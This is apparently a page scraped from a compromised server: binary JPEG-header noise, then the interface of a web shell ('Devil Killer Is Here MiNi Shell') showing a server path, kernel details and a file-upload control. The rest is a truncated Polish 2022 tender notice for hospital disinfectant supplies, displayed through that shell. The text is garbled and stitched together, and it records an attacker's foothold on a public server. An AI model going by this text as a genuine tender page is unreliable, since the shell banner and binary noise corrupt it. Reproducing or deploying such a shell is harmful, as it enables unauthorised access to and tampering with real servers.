JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220705/0023847101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa środków antyseptycznych i dezynfekcyjnych dla potrzeb Szpitala Miejskiego w Siemianowicach Śląskich Sp. z o.o. ” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szpital Miejski w Siemianowicach Śląskich Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000308270</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">1-go Maja 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Siemianowice Śląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@zozsiemianowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zozsiemianowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa środków antyseptycznych i dezynfekcyjnych dla potrzeb Szpitala Miejskiego w Siemianowicach Śląskich Sp. z o.o. ” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-471ad902-fb80-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00238471</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00056523/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.6 Dostawa środków do dezynfekcji</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-471ad902-fb80-11ec-9a86-f6f4c648a056 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy.<br/>W celu prawidłowego korzystania z usług Platformy e-Zamówienia wymagany jest:<br/>A. Komputer PC:<br/>1)	parametry minimum: Intel Core2 Duo, 2 GB RAM, HDD<br/>2)	zainstalowany jedne z poniższych systemów operacyjnych:<br/>•	MS Windows 7 lub nowszy<br/>•	OSX/Mac OS 10.10,<br/>•	Ubuntu 14.04<br/>3)	zainstalowana jedna z poniższych przeglądarek:<br/>•	Chrome 66.0 lub nowsza<br/>•	Firefox 59.0 lub nowszy<br/>•	Safari 11.1 lub nowsza<br/>•	Edge 14.0 i nowsze<br/>B.Tablet/Telefon<br/>1)	Parametry minimum: 4 rdzenie procesora, 2GB RAM, Android 6.0 Marshmallow, iOS 10.3<br/>2)	Przeglądarka Chrome 61 lub nowa.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>a)	Administratorem Pani/a danych osobowych jest Szpital Miejski w Siemianowicach Śląskich z siedziba w Siemianowicach Śląskich (41-100 ), ul. 1 – go Maja 9,<br/>b)	Administrator wyznaczył Inspektora Ochrony Danych, z którym może się Pani/Pan skontaktować w sprawach związanych z ochroną danych osobowych w następujący sposób:<br/>	pod adresem poczty elektronicznej: iod@zozsiemianowice.pl;<br/>	pisemnie na adres siedziby Administratora;<br/>c)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego. <br/>d)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp. <br/>e)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy lub okres ustalony w oparciu o uzasadniony interes realizowany przez administratora. <br/>f)	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp. <br/>g)	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO. <br/>h)	Posiada Pani/Pan: <br/>•	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; <br/>•	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych; <br/>•	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>•	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO. <br/>i)	Nie przysługuje Pani/Panu: <br/>•	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu: <br/>•	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SZM/DZ/341/17/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET 1 - Dezynfekcja rąk, skóry i błon śluzowych<br/><br/>1.	Preparat bezbarwny do odkażania /o przedłużonym czasie działania/ i do odtłuszczania skóry, auto sterylny, oparty o alkohol etylowy, izopropylowy, benzylowy i nadtlenek wodoru bez zawartości grup fenolowych, jodu i jego związków. Szerokie spektrum działania na mikroorganizmy występujące na powierzchni skóry. Działający na bakterie( łącznie z Tbc i MRSA), grzyby, wirusy( HBV i HIV, Herpes, Rota, Adeno). <br/>Posiadający pozytywną opinię Instytutu Matki i Dziecka.<br/>	<br/>2.	Preparat barwiony do odkażania /o przedłużonym czasie działania / i do odtłuszczania, zabarwienia skóry, auto sterylny oparty o alkohol etylowy, izopropylowy, benzylowy i nadtlenek wodoru bez zawartości grup fenolowych, jodu i jego związków. Szerokie spektrum działania na mikroorganizmy występujące na powierzchni skóry. Działający na bakterie( łącznie z Tbc i MRSA), grzyby, wirusy( HBV i HIV, Herpes, Rota, Adeno).<br/>3.	Preparat do chirurgicznego i higienicznego mycia rąk. Nie zawierający mydła, nie alkoholowy i nie wysuszający skóry. O pH 5,0- 5,5. Oparty o APG / alkilopoliglikozydy /.<br/>	<br/>4.	Preparat do chirurgicznego i higienicznego mycia rąk o pH 5,0 dla osób o szczególnie wrażliwej skórze<br/>5	Szybko działający alkoholowy płyn do higienicznej i chirurgicznej dezynfekcji rąk na bazie alkoholu etylowego, bez zawartości dodatkowych substancji czynnych; zawierający substancje pielęgnujące (d-pantenol, witaminę E). Produkt bez zawartości substancji barwiących i zapachowych. Testowany dermatologicznie. Spektrum działania: B, Y, Prątki, Virusy (adeno,noro,rota) w czasie do 15s. <br/>Dezynfekcja higieniczna EN 1500 oraz chirurgiczna EN 12791. Produkt biobójczy.<br/>* do pozycji wymaganych jest dostarczyć 170 haków na łóżka oraz 340 sztuk pompek wraz z pierwszą dostawą<br/>	<br/>6	Emulsja do pielęgnacji wrażliwej, suchej oraz skłonnej do podrażnień skóry rąk i ciała. Zalecana w szczególności podczas częstej dezynfekcji skór rąk. Posiadająca badania dermatologiczne. Z zawartością witamin. Min. Vitamina E. Butelka 500 ml wraz z dołączona pompka. <br/>7<br/>	Gotowy do użycia preparat w płynie przeznaczony do higienicznej i chirurgicznej dezynfekcji rąk o wrażliwej skórze; oparty na mieszaninie wyłącznie alkoholowych substancji czynnych, bez zawartości potencjalnie drażniących i alergizujących związków takich jak barwniki, środki zapachowe, pochodne fenolowe i chlorheksydyny, kwasy organiczne; pH 5,5; skuteczny w czasie 30s (dezynfekcja higieniczna) i 90s (dezynfekcja chirurgiczna); skuteczny na bakterie (w tym Tbc), grzyby i drożdżaki, wirusy (HBV, HCV, HIV, Herpes Simplex, Vaccinia, Rota, Noro, Adeno, Polio); przebadany wg. EN 14476; produkt leczniczy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">13.1. Przy wyborze oferty Zamawiający będzie kierował się: kryterium ceny i kryterium „Terminu zapłaty” oraz „Terminu dostawy”. <br/>13.2. Kryteria oceny ofert i ich znaczenie oraz opis sposobu oceny ofert:<br/>A.	Kryterium „Cena” w PLN:<br/>a)	znaczenie kryterium - 60% (60 pkt);<br/>b)	opis sposobu oceny ofert dla kryterium „Ceny”: <br/>cena = (Cmin / C) x 60 pkt <br/>gdzie:<br/>cena - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty<br/>Cmin - cena w ofercie z najniższą ceną<br/>C - cena w ofercie ocenianej <br/>B.	Kryterium „Termin zapłaty” w dniach:<br/>a)	znaczenie kryterium - 20% (20 pkt);<br/>b)	opis sposobu oceny ofert dla kryterium „Termin zapłaty”: <br/>TZ = (TZ / TZmax) x 20 pkt <br/>gdzie:<br/>TZ - liczba uzyskanych punktów dla kryterium „Termin zapłaty” ocenianej oferty<br/>TZ - termin zapłaty w ofercie ocenianej <br/>TZmax - termin zapłaty w ofercie z najdłuższym terminem zapłaty<br/>Wykonawca podaje termin zapłaty w liczbach całkowitych.<br/>Termin zapłaty nie może być krótszy niż 30 dni oraz dłuższy niż 60 dni zgodnie z art. 8 ust. 3 ustawy <br/>o terminach zapłaty w transakcjach handlowych. Zamawiający wskazuje, iż uzasadnieniem zastosowania dłuższego terminu zapłaty są okoliczności związane z zasadami finansowania Zmawiającego przez publicznego płatnika jakim jest NFZ z tytułu prowadzonej działalności leczniczej stanowiącej podstawową działalność Zamawiającego. <br/>C.	Kryterium „Termin dostawy” w dniach:<br/>a)	znaczenie kryterium - 20% (20 pkt); (minimalny termin wynosi 2 dni)<br/>b)	opis sposobu oceny ofert dla kryterium „Termin dostawy”: <br/>TD = (OT / OTmin) x 20 pkt <br/>gdzie:<br/>TD - liczba uzyskanych punktów dla kryterium „Termin dostawy” ocenianej oferty<br/>OT – termin dostawy w ofercie ocenianej <br/>OTmin – termin dostawy w ofercie z najkrótszym terminem dostawy<br/>Wykonawca oferuje termin dostawy mieszczący się w przedziale od 2 do 5 dni. Najkrótszy proponowany termin dostawy otrzyma maksymalną ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN ZAPŁATY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN DOSTAWY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET 2 - DEZYNFEKCJA I MYCIE powierzchni i wyrobów medycznych<br/>1.	Preparat w formie nasączonych chusteczek do mycia i dezynfekcji wyrobów medycznych oraz powierzchni z szybko działającym nadtlenkiem wodoru (rozkład do wody i tlenu, o działaniu bakteriobójczym, wirusobójczym i sporobójczym ( EN 16615) Ilość chusteczek w wiaderku 50 szt., gramatura chusteczek 50 g/m². Wymiary chusteczek:25x37cm.<br/>Produkt nie sklasyfikowany jako niebezpieczny. <br/>Nie wymagjący uzycia rękawic ochronnych. <br/>Wymagana dualna rejestracja (wyrób medyczny oraz produkt Biobójczy)<br/>2.	Chusteczki do szybkiej dezynfekcji i mycia małych powierzchni i wyrobów medycznych włącznie z głowicami USG potwierdzenie producentów. Substancja aktywna bazie czwartorzędowych związków amonowych. Spektrum działania B( łącznie z MRSA), Y w czasie do 1 min., V (HBV, HIV, HCV, Rota, Vaccinia) w czasie 30 sek., Papova/ Polyoma - 2 min. Skuteczne zgodnie z normą PN-EN 16615 ( warunki brudne) - 1 minuta. Roztwór, którym są nasączone nie może posiadać w swoim składzie alkoholi, chloru, aldehydów, fenoli. Posiadające opinię dermatologiczną oraz pozytywną opinię producentów urządzeń ultrasonograficznych. Opakowanie typu flow pack min. 40 sztuk z zamknięciem w postaci plastikowego klipsa, chusteczki o wym. min. 24 cm x 30 cm o gramaturze min. 50g/m2 wykonane z 100 % PET. <br/>Wyrób Medyczny<br/>3.	Gotowa do użycia pianka do dezynfekcji oraz mycia powierzchni nieinwazyjnych wyrobów medycznych oraz różnego rodzaju powierzchni nie będących wyrobami medycznymi. Preparat oparty o nadtlenek wodoru min. 6,5 grama na 100 gramach produktu. Wykazujący następujące działanie bójcze: B, Y, F, Prątki, Wirusy (Polio, Adeno, Noro) oraz działanie sporobójcze ( C. difficile Rybotyp O27) Preparat Spełniający wymogi Norm: EN 16615 oraz EN 17126 lub równważną. Możliwość stosowania do powierzchni mających kontakt z żywnością. Wymagana dualna rejestracja (wyrób medyczny oraz produkt Biobójczy). Opakowanie 750 ml z końcówką spieniającą. <br/>4.	Gotowa do użycia pianka do mycia i dezynfekcji delikatnych powierzchni wrażliwych na działanie alkoholi. Dos tosowania na powierzchniach sprzętu medycznego za szkła, porcelany, metalu, gumy, tworzyw sztucznych oraz szkła akrylowego a także do powierzchni mającej kontakt z żywnością. Skład: aminy, QUV (bez zawartości alkoholu) Spektrum i czas działania: b, MRSA, F, Tbc, V (HBV, HIV, HCV, BvDV, Vaccinia, Herpes simplex, Ebola) w 5 min. Rejestracja: wyrób medyczny </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">13.1. Przy wyborze oferty Zamawiający będzie kierował się: kryterium ceny i kryterium „Terminu zapłaty” oraz „Terminu dostawy”. <br/>13.2. Kryteria oceny ofert i ich znaczenie oraz opis sposobu oceny ofert:<br/>A.	Kryterium „Cena” w PLN:<br/>a)	znaczenie kryterium - 60% (60 pkt);<br/>b)	opis sposobu oceny ofert dla kryterium „Ceny”: <br/>cena = (Cmin / C) x 60 pkt <br/>gdzie:<br/>cena - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty<br/>Cmin - cena w ofercie z najniższą ceną<br/>C - cena w ofercie ocenianej <br/>B.	Kryterium „Termin zapłaty” w dniach:<br/>a)	znaczenie kryterium - 20% (20 pkt);<br/>b)	opis sposobu oceny ofert dla kryterium „Termin zapłaty”: <br/>TZ = (TZ / TZmax) x 20 pkt <br/>gdzie:<br/>TZ - liczba uzyskanych punktów dla kryterium „Termin zapłaty” ocenianej oferty<br/>TZ - termin zapłaty w ofercie ocenianej <br/>TZmax - termin zapłaty w ofercie z najdłuższym terminem zapłaty<br/>Wykonawca podaje termin zapłaty w liczbach całkowitych.<br/>Termin zapłaty nie może być krótszy niż 30 dni oraz dłuższy niż 60 dni zgodnie z art. 8 ust. 3 ustawy <br/>o terminach zapłaty w transakcjach handlowych. Zamawiający wskazuje, iż uzasadnieniem zastosowania dłuższego terminu zapłaty są okoliczności związane z zasadami finansowania Zmawiającego przez publicznego płatnika jakim jest NFZ z tytułu prowadzonej działalności leczniczej stanowiącej podstawową działalność Zamawiającego. <br/>C.	Kryterium „Termin dostawy” w dniach:<br/>a)	znaczenie kryterium - 20% (20 pkt); (minimalny termin wynosi 2 dni)<br/>b)	opis sposobu oceny ofert dla kryterium „Termin dostawy”: <br/>TD = (OT / OTmin) x 20 pkt <br/>gdzie:<br/>TD - liczba uzyskanych punktów dla kryterium „Termin dostawy” ocenianej oferty<br/>OT – termin dostawy w ofercie ocenianej <br/>OTmin – termin dostawy w ofercie z najkrótszym terminem dostawy<br/>Wykonawca oferuje termin dostawy mieszczący się w przedziale od 2 do 5 dni. Najkrótszy 